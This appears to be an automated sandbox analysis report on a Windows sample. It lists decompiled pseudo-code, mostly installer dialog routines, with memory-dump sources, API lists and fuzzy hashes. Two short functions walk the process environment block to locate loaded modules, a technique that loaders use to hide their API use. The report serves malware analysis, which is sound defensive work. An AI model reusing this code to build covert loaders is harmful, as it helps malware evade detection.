                                                                    0x00407573
                                                                    0x00407580
                                                                    0x00407580
                                                                    0x00407583
                                                                    0x0040758a
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x004073b0
                                                                    0x00407330
                                                                    0x00407332
                                                                    0x00407332
                                                                    0x00407336
                                                                    0x00407339
                                                                    0x0040733a
                                                                    0x0040733a
                                                                    0x00000000
                                                                    0x00407332
                                                                    0x004072a6
                                                                    0x004072ac
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                    • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                    • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                    • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C347A3, Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E72C347A3(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E72C346E7(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}








                                                                    0x72c347af
                                                                    0x72c347b8
                                                                    0x72c347c1
                                                                    0x72c347ca
                                                                    0x72c347cd
                                                                    0x72c347ec
                                                                    0x72c347f5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c347f7
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242406987.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000000.00000002.242369499.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242381961.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242396929.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242433913.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                    • Instruction ID: de74df940c9f2ee64a6bb62b3a7725c423138fc68bbd595b19421b4ba3cc1099
                                                                    • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                    • Instruction Fuzzy Hash: E9014C78A10208EFCB52DF9DCA80D9DBBF5EB19220B518596E814EB711D330AE50DB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C345A0, Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E72C345A0() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                    0x72c345b7

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242406987.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000000.00000002.242369499.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242381961.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242396929.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242433913.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                    • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                    • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                    • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x53b4aa
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                    0x00404cf4
                                                                    0x00404cfc
                                                                    0x00404d04
                                                                    0x00404d0a
                                                                    0x00404d22
                                                                    0x00404d25
                                                                    0x00404d26
                                                                    0x00404f53
                                                                    0x00404f5a
                                                                    0x00404f6e
                                                                    0x00404f5c
                                                                    0x00404f5e
                                                                    0x00404f61
                                                                    0x00404f62
                                                                    0x00404f69
                                                                    0x00404f69
                                                                    0x00404f7a
                                                                    0x00404f88
                                                                    0x00404f8b
                                                                    0x00404fa1
                                                                    0x00405016
                                                                    0x00405019
                                                                    0x0040501b
                                                                    0x00405025
                                                                    0x00405033
                                                                    0x00405033
                                                                    0x00405035
                                                                    0x0040503f
                                                                    0x00405045
                                                                    0x00405048
                                                                    0x0040504b
                                                                    0x00405066
                                                                    0x0040504d
                                                                    0x00405057
                                                                    0x00405057
                                                                    0x0040504b
                                                                    0x0040503f
                                                                    0x00000000
                                                                    0x00405019
                                                                    0x00404fa6
                                                                    0x00404fb1
                                                                    0x00404fb6
                                                                    0x00404fbd
                                                                    0x00404fc2
                                                                    0x00404fc6
                                                                    0x00404fd1
                                                                    0x00404fd1
                                                                    0x00404fd5
                                                                    0x00404fd9
                                                                    0x00404fdd
                                                                    0x00404ff0
                                                                    0x00404fdf
                                                                    0x00404fdf
                                                                    0x00404fe6
                                                                    0x00404fec
                                                                    0x00404fe8
                                                                    0x00404fe8
                                                                    0x00404fe8
                                                                    0x00404fe6
                                                                    0x00404ff4
                                                                    0x00404ff6
                                                                    0x00405009
                                                                    0x0040500c
                                                                    0x0040500f
                                                                    0x0040500f
                                                                    0x00404fd9
                                                                    0x00000000
                                                                    0x00404fc6
                                                                    0x00404fa8
                                                                    0x00404faf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405069
                                                                    0x00405069
                                                                    0x00405070
                                                                    0x004050e1
                                                                    0x004050e9
                                                                    0x004050f1
                                                                    0x004050f1
                                                                    0x004050fa
                                                                    0x004050fc
                                                                    0x00405103
                                                                    0x00405106
                                                                    0x00405106
                                                                    0x0040510c
                                                                    0x00405113
                                                                    0x00405116
                                                                    0x00405116
                                                                    0x0040511c
                                                                    0x00405122
                                                                    0x00405128
                                                                    0x00405128
                                                                    0x00405135
                                                                    0x00405295
                                                                    0x0040529c
                                                                    0x004052b9
                                                                    0x004052bf
                                                                    0x004052d1
                                                                    0x004052d1
                                                                    0x00000000
                                                                    0x0040513b
                                                                    0x0040513d
                                                                    0x00405142
                                                                    0x00405147
                                                                    0x0040514c
                                                                    0x0040514e
                                                                    0x0040514e
                                                                    0x0040514f
                                                                    0x00405150
                                                                    0x00405152
                                                                    0x00405152
                                                                    0x0040515a
                                                                    0x0040519b
                                                                    0x0040519d
                                                                    0x004051ad
                                                                    0x004051b0
                                                                    0x004051b5
                                                                    0x004051bc
                                                                    0x004051bf
                                                                    0x00405261
                                                                    0x00405269
                                                                    0x00405271
                                                                    0x00405271
                                                                    0x00405277
                                                                    0x0040527f
                                                                    0x00405290
                                                                    0x00405290
                                                                    0x00000000
                                                                    0x0040527f
                                                                    0x004051c5
                                                                    0x004051c8
                                                                    0x004051ce
                                                                    0x004051d3
                                                                    0x004051d5
                                                                    0x004051d7
                                                                    0x004051dd
                                                                    0x004051e4
                                                                    0x004051e9
                                                                    0x004051f0
                                                                    0x004051f3
                                                                    0x004051f3
                                                                    0x004051fa
                                                                    0x00405206
                                                                    0x0040520a
                                                                    0x0040520c
                                                                    0x0040520c
                                                                    0x004051fc
                                                                    0x004051fe
                                                                    0x004051fe
                                                                    0x0040522c
                                                                    0x00405238
                                                                    0x00405247
                                                                    0x00405247
                                                                    0x00405249
                                                                    0x0040524c
                                                                    0x00405255
                                                                    0x00000000
                                                                    0x0040515c
                                                                    0x00405167
                                                                    0x0040516a
                                                                    0x0040516f
                                                                    0x00405171
                                                                    0x00405175
                                                                    0x00405185
                                                                    0x0040518f
                                                                    0x00405191
                                                                    0x00405194
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405177
                                                                    0x00405177
                                                                    0x0040517d
                                                                    0x0040517f
                                                                    0x0040517f
                                                                    0x00405180
                                                                    0x00405181
                                                                    0x00000000
                                                                    0x00405177
                                                                    0x0040515a
                                                                    0x00405135
                                                                    0x00405078
                                                                    0x00000000
                                                                    0x0040508e
                                                                    0x00405098
                                                                    0x0040509d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004050af
                                                                    0x004050b4
                                                                    0x004050c0
                                                                    0x004050c0
                                                                    0x004050c2
                                                                    0x004050d1
                                                                    0x004050d3
                                                                    0x004050d7
                                                                    0x004050da
                                                                    0x00000000
                                                                    0x004050da
                                                                    0x00405078
                                                                    0x00404d2c
                                                                    0x00404d2f
                                                                    0x00404d32
                                                                    0x00404d42
                                                                    0x00404d55
                                                                    0x00404d60
                                                                    0x00404d66
                                                                    0x00404d74
                                                                    0x00404d87
                                                                    0x00404d8c
                                                                    0x00404d97
                                                                    0x00404da0
                                                                    0x00404db6
                                                                    0x00404dc6
                                                                    0x00404dd2
                                                                    0x00404dd2
                                                                    0x00404dd7
                                                                    0x00404ddd
                                                                    0x00404ddf
                                                                    0x00404de2
                                                                    0x00404de7
                                                                    0x00404dec
                                                                    0x00404dee
                                                                    0x00404dee
                                                                    0x00404e0e
                                                                    0x00404e0e
                                                                    0x00404e10
                                                                    0x00404e11
                                                                    0x00404e16
                                                                    0x00404e1c
                                                                    0x00404e20
                                                                    0x00404e25
                                                                    0x00404e2d
                                                                    0x00404e31
                                                                    0x00404e36
                                                                    0x00404e3b
                                                                    0x00404e43
                                                                    0x00404e46
                                                                    0x00404f15
                                                                    0x00404f28
                                                                    0x00000000
                                                                    0x00404e4c
                                                                    0x00404e4f
                                                                    0x00404e52
                                                                    0x00404e55
                                                                    0x00404e55
                                                                    0x00404e5a
                                                                    0x00404e63
                                                                    0x00404e66
                                                                    0x00404e6a
                                                                    0x00404e6d
                                                                    0x00404e70
                                                                    0x00404e79
                                                                    0x00404e82
                                                                    0x00404e85
                                                                    0x00404e88
                                                                    0x00404e8b
                                                                    0x00404ec9
                                                                    0x00404ef4
                                                                    0x00404ecb
                                                                    0x00404eda
                                                                    0x00404eda
                                                                    0x00404e8d
                                                                    0x00404e90
                                                                    0x00404e9e
                                                                    0x00404ea8
                                                                    0x00404eb0
                                                                    0x00404eb7
                                                                    0x00404ec2
                                                                    0x00404ec2
                                                                    0x00404e8b
                                                                    0x00404efa
                                                                    0x00404efb
                                                                    0x00404f07
                                                                    0x00404f07
                                                                    0x00404f13
                                                                    0x00404f2e
                                                                    0x00404f31
                                                                    0x00404f4e
                                                                    0x00000000
                                                                    0x00404f33
                                                                    0x00404f38
                                                                    0x00404f41
                                                                    0x004052d3
                                                                    0x004052e5
                                                                    0x004052e5
                                                                    0x00404f31
                                                                    0x00000000
                                                                    0x00404f13
                                                                    0x00404e46

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00404CED
                                                                    • GetDlgItem.USER32 ref: 00404CFA
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                    • LoadImageA.USER32 ref: 00404D60
                                                                    • SetWindowLongA.USER32(?,000000FC,004052E8), ref: 00404D7A
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                    • SendMessageA.USER32 ref: 00404DB6
                                                                    • SendMessageA.USER32 ref: 00404DC2
                                                                    • SendMessageA.USER32 ref: 00404DD2
                                                                    • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                    • SendMessageA.USER32 ref: 00404E02
                                                                    • SendMessageA.USER32 ref: 00404E0E
                                                                    • SendMessageA.USER32 ref: 00404EA8
                                                                    • SendMessageA.USER32 ref: 00404ED8
                                                                      • Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314
                                                                    • SendMessageA.USER32 ref: 00404EEC
                                                                    • GetWindowLongA.USER32 ref: 00404F1A
                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F28
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                    • SendMessageA.USER32 ref: 00405033
                                                                    • SendMessageA.USER32 ref: 00405098
                                                                    • SendMessageA.USER32 ref: 004050AD
                                                                    • SendMessageA.USER32 ref: 004050D1
                                                                    • SendMessageA.USER32 ref: 004050F1
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                    • GlobalFree.KERNEL32 ref: 00405116
                                                                    • SendMessageA.USER32 ref: 0040518F
                                                                    • SendMessageA.USER32 ref: 00405238
                                                                    • SendMessageA.USER32 ref: 00405247
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                    • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                    • GetDlgItem.USER32 ref: 004052CA
                                                                    • ShowWindow.USER32(00000000), ref: 004052D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                    • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                    • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                    • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
